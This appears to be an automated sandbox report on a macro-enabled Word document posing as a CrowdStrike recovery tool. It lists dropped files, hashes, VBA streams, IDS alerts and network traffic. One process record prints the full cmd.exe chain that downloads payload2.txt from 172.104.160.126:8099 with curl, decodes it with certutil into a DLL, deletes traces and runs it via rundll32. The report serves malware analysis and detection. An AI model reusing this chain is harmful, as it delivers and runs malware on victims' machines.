    Size (bytes):5596
    Entropy (8bit):7.875182123405584
    Encrypted:false
    SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
    MD5:CDC1493350011DB9892100E94D5592FE
    SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
    SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
    SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
    Malicious:false
    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):274
    Entropy (8bit):3.438490642908344
    Encrypted:false
    SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
    MD5:0F98498818DC28E82597356E2650773C
    SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
    SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
    SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):34415
    Entropy (8bit):7.352974342178997
    Encrypted:false
    SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
    MD5:7CDFFC23FB85AD5737452762FA36AAA0
    SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
    SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
    SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
    Malicious:false
    Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):290
    Entropy (8bit):3.5161159456784024
    Encrypted:false
    SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
    MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
    SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
    SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
    SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):344303
    Entropy (8bit):5.023195898304535
    Encrypted:false
    SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
    MD5:F079EC5E2CCB9CD4529673BCDFB90486
    SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
    SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
    SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):260
    Entropy (8bit):3.4895685222798054
    Encrypted:false
    SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
    MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
    SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
    SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
    SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
    Malicious:false
    Preview (UTF-16LE decoded):
    [File]
    OriginalName: VaryingWidthList.glox
    Component: WordFiles
    ReqVer: 14
    StoreLocation: {My Templates}\SmartArt Graphics
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):3075
    Entropy (8bit):7.716021191059687
    Encrypted:false
    SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
    MD5:67766FF48AF205B771B53AA2FA82B4F4
    SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
    SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
    SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):777647
    Entropy (8bit):7.689662652914981
    Encrypted:false
    SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
    MD5:B30D2EF0FC261AECE90B62E9C5597379
    SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
    SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
    SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):290
    Entropy (8bit):3.5091498509646044
    Encrypted:false
    SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
    MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
    SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
    SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
    SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
    Malicious:false
    Preview (UTF-16LE decoded, BOM stripped):
    [File]
    OriginalName: Metropolitan.thmx
    Component: PPTFiles
    ReqVer: 14
    Executable: {PP}
    StoreLocation: {My Templates}
    Command: {FilePath}
    File type:Microsoft Word 2007+
    Entropy (8bit):7.938940748289286
    TrID:
    • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
    • Word Microsoft Office Open XML Format document (49504/1) 36.13%
    • Word Microsoft Office Open XML Format document (27504/1) 20.07%
    • ZIP compressed archive (8000/1) 5.84%
    File name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
    File size:310'160 bytes
    MD5:dd2100dfa067caae416b885637adc4ef
    SHA1:499f8881f4927e7b4a1a0448f62c60741ea6d44b
    SHA256:803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
    SHA512:809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda
    SSDEEP:6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8
    TLSH:1664E12B7D13A023F52BD6349E903E6C72026111A3935374B9286B7FF26D14F9D8E54B
    File Content Preview:PK..........!..am.............[Content_Types].xml ...(.........................................................................................................................................................................................................
    Icon Hash:1d35646ca6a49919
    Document Type:OpenXML
    Number of OLE Files:1
    Has Summary Info:
    Application Name:
    Encrypted Document:False
    Contains Word Document Stream:True
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:False
    Flash Objects Count:0
    Contains VBA Macros:True
    Author:Le Nho Thanh
    Template:Normal.dotm
    Last Saved By:David
    Revision Number:3
    Total Edit Time:4
    Create Time:2024-07-19T10:29:00Z
    Last Saved Time:2024-07-22T09:13:00Z
    Number of Pages:9
    Number of Words:2526
    Number of Characters:14404
    Creating Application:Microsoft Office Word
    Security:0
    Number of Lines:120
    Number of Paragraphs:33
    Thumbnail Scaling Desired:false
    Company:Microsoft
    Contains Dirty Links:false
    Shared Document:false
    Changed Hyperlinks:false
    Application Version:16.0000
    General
    Stream Path:VBA/ThisDocument
    VBA File Name:ThisDocument.cls
    Stream Size:27601
    General
    Stream Path:PROJECT
    CLSID:
    File Type:ASCII text, with CRLF line terminators
    Stream Size:376
    Entropy:5.349004928853029
    Base64 Encoded:True
    Data ASCII (decoded, one line per CRLF; truncated in the report):
    ID="{63940D17-7BC7-4146-BA95-1389FF702C58}"
    Document=ThisDocument/&H00000000
    Name="Project"
    HelpContextID="0"
    VersionCompatible32="393222000"
    CMG="D5D76E4796189A189A189A189A"
    DPB="AAA811B6E7B7E7B7E7"
    GC="7F7DC4ED4C1720182018DF"
    [HostExtenderInf
    General
    Stream Path:PROJECTwm
    CLSID:
    File Type:data
    Stream Size:41
    Entropy:3.0773844850752607
    Base64 Encoded:False
    Data ASCII (decoded):ThisDocument (ANSI), followed by ThisDocument in UTF-16LE
    General
    Stream Path:VBA/_VBA_PROJECT
    CLSID:
    File Type:data
    Stream Size:2976
    Entropy:4.617966626265468
    Base64 Encoded:False
    Data ASCII (UTF-16LE decoded after the binary header; truncated in the report):*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL#Visual Basic Fo
    General
    Stream Path:VBA/__SRP_0
    CLSID:
    File Type:data
    Stream Size:2782
    Entropy:3.5082390293182035
    Base64 Encoded:False
    General
    Stream Path:VBA/__SRP_1
    CLSID:
    File Type:data
    Stream Size:174
    Entropy:1.6032810527820052
    Base64 Encoded:False
    General
    Stream Path:VBA/__SRP_2
    CLSID:
    File Type:data
    Stream Size:1224
    Entropy:2.0062113510689086
    Base64 Encoded:False
    General
    Stream Path:VBA/__SRP_3
    CLSID:
    File Type:data
    Stream Size:356
    Entropy:2.1693699541959686
    Base64 Encoded:False
    General
    Stream Path:VBA/dir
    CLSID:
    File Type:data
    Stream Size:514
    Entropy:6.2857106919283545
    Base64 Encoded:True
    Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
    2024-07-22T15:58:45.771195+0200 | TCP | 2029280 | ET MALWARE Observed Certificate Base64 Encoded Executable Inbound | 8099 | 49195 | 172.104.160.126 | 192.168.2.6
    2024-07-22T15:57:48.044440+0200 | TCP | 2029280 | ET MALWARE Observed Certificate Base64 Encoded Executable Inbound | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Jul 22, 2024 15:57:37.290169954 CEST | 49673 | 443 | 192.168.2.6 | 173.222.162.64
    Jul 22, 2024 15:57:37.290256977 CEST | 49674 | 443 | 192.168.2.6 | 173.222.162.64
    Jul 22, 2024 15:57:37.618436098 CEST | 49672 | 443 | 192.168.2.6 | 173.222.162.64
    Jul 22, 2024 15:57:46.593611002 CEST | 49714 | 443 | 192.168.2.6 | 40.126.31.69
    Jul 22, 2024 15:57:46.593657017 CEST | 443 | 49714 | 40.126.31.69 | 192.168.2.6
    Jul 22, 2024 15:57:46.593781948 CEST | 49714 | 443 | 192.168.2.6 | 40.126.31.69
    Jul 22, 2024 15:57:46.593995094 CEST | 49714 | 443 | 192.168.2.6 | 40.126.31.69
    Jul 22, 2024 15:57:46.594027996 CEST | 443 | 49714 | 40.126.31.69 | 192.168.2.6
    Jul 22, 2024 15:57:46.611236095 CEST | 49715 | 443 | 192.168.2.6 | 40.113.103.199
    Jul 22, 2024 15:57:46.611321926 CEST | 443 | 49715 | 40.113.103.199 | 192.168.2.6
    Jul 22, 2024 15:57:46.611478090 CEST | 49715 | 443 | 192.168.2.6 | 40.113.103.199
    Jul 22, 2024 15:57:46.612370968 CEST | 49715 | 443 | 192.168.2.6 | 40.113.103.199
    Jul 22, 2024 15:57:46.612407923 CEST | 443 | 49715 | 40.113.103.199 | 192.168.2.6
    Jul 22, 2024 15:57:46.689435959 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:46.695535898 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:46.695604086 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:46.718877077 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:46.723723888 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:46.899533033 CEST | 49673 | 443 | 192.168.2.6 | 173.222.162.64
    Jul 22, 2024 15:57:46.899660110 CEST | 49674 | 443 | 192.168.2.6 | 173.222.162.64
    Jul 22, 2024 15:57:47.227660894 CEST | 49672 | 443 | 192.168.2.6 | 173.222.162.64
    Jul 22, 2024 15:57:47.923765898 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.924438000 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.924448967 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.924458027 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.924504995 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.924529076 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.925273895 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.925286055 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.925296068 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.925307035 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.925337076 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.925355911 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.926068068 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.926084042 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.926095009 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.926152945 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.926978111 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.927090883 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.942838907 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.942893028 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.943176985 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.943187952 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.943279028 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.943407059 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.944150925 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.944161892 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.944170952 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.944180012 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.944192886 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.944237947 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.945236921 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.945250034 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.945307970 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.946266890 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.946276903 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.946305037 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.947113991 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.947124004 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.947128057 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.947138071 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.947166920 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.948944092 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.948954105 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.949001074 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.950728893 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.950809002 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.951641083 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.951652050 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.951662064 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.951670885 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:47.951699018 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:47.951725960 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:48.044440031 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:48.044703007 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:48.044751883 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:48.130525112 CEST | 443 | 49714 | 40.126.31.69 | 192.168.2.6
    Jul 22, 2024 15:57:48.130584002 CEST | 443 | 49715 | 40.113.103.199 | 192.168.2.6
    Jul 22, 2024 15:57:48.130661011 CEST | 49715 | 443 | 192.168.2.6 | 40.113.103.199
    Jul 22, 2024 15:57:48.131546974 CEST | 49714 | 443 | 192.168.2.6 | 40.126.31.69
    Jul 22, 2024 15:57:48.133389950 CEST | 49715 | 443 | 192.168.2.6 | 40.113.103.199
    Jul 22, 2024 15:57:48.133418083 CEST | 443 | 49715 | 40.113.103.199 | 192.168.2.6
    Jul 22, 2024 15:57:48.133835077 CEST | 443 | 49715 | 40.113.103.199 | 192.168.2.6
    Jul 22, 2024 15:57:48.135431051 CEST | 49715 | 443 | 192.168.2.6 | 40.113.103.199
    Jul 22, 2024 15:57:48.135663033 CEST | 49715 | 443 | 192.168.2.6 | 40.113.103.199
    Jul 22, 2024 15:57:48.135675907 CEST | 443 | 49715 | 40.113.103.199 | 192.168.2.6
    Jul 22, 2024 15:57:48.136001110 CEST | 49715 | 443 | 192.168.2.6 | 40.113.103.199
    Jul 22, 2024 15:57:48.144507885 CEST | 49714 | 443 | 192.168.2.6 | 40.126.31.69
    Jul 22, 2024 15:57:48.144521952 CEST | 443 | 49714 | 40.126.31.69 | 192.168.2.6
    Jul 22, 2024 15:57:48.144990921 CEST | 443 | 49714 | 40.126.31.69 | 192.168.2.6
    Jul 22, 2024 15:57:48.145420074 CEST | 49714 | 443 | 192.168.2.6 | 40.126.31.69
    Jul 22, 2024 15:57:48.145600080 CEST | 49714 | 443 | 192.168.2.6 | 40.126.31.69
    Jul 22, 2024 15:57:48.145652056 CEST | 443 | 49714 | 40.126.31.69 | 192.168.2.6
    Jul 22, 2024 15:57:48.176534891 CEST | 443 | 49715 | 40.113.103.199 | 192.168.2.6
    Jul 22, 2024 15:57:48.185066938 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:48.185121059 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:48.185154915 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:48.185205936 CEST | 49717 | 8099 | 192.168.2.6 | 172.104.160.126
    Jul 22, 2024 15:57:48.185282946 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Jul 22, 2024 15:57:48.185316086 CEST | 8099 | 49717 | 172.104.160.126 | 192.168.2.6
    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
    Jul 22, 2024 15:58:19.670135021 CEST | 192.168.2.6 | 1.1.1.1 | 0x960f | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
    Jul 22, 2024 15:58:19.670432091 CEST | 192.168.2.6 | 1.1.1.1 | 0xf41f | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
    Jul 22, 2024 15:57:57.744838953 CEST | 1.1.1.1 | 192.168.2.6 | 0x58f8 | No error (0) | templatesmetadata.office.net | templatesmetadata.office.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
    Jul 22, 2024 15:58:19.677860022 CEST | 1.1.1.1 | 192.168.2.6 | 0xf41f | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
    Jul 22, 2024 15:58:19.678556919 CEST | 1.1.1.1 | 192.168.2.6 | 0x960f | No error (0) | www.google.com |  | 142.250.186.164 | A (IP address) | IN (0x0001) | false
    Jul 22, 2024 15:58:46.119676113 CEST | 1.1.1.1 | 192.168.2.6 | 0x3d19 | No error (0) | templatesmetadata.office.net | templatesmetadata.office.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false

    Target ID:0
    Start time:09:57:38
    Start date:22/07/2024
    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x740000
    File size:1'620'872 bytes
    MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:8
    Start time:09:57:44
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
    Imagebase:0x1c0000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:9
    Start time:09:57:44
    Start date:22/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
